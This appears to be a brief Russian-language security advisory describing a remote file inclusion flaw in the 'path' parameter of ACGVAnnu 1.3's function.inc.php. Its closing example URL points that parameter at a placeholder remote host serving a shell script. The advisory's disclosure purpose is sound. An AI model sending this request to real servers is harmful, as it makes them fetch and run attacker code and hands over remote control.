Программа: ACGVAnnu 1.3
Уязвимость позволяет удаленному пользователю выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "path" сценарием function.inc.php. Удаленный пользователь может выполнить произвольный сценарий на целевой системе.
Пример:
http://www.example.com/function.inc.php?path=http://[target]/[path]/shell.x